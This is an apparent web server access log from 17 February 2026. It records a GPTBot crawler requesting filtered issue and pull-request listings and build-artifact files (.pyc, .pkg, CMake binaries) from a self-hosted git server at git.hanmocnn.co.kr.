"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10261] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11275] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 13015] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:19:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 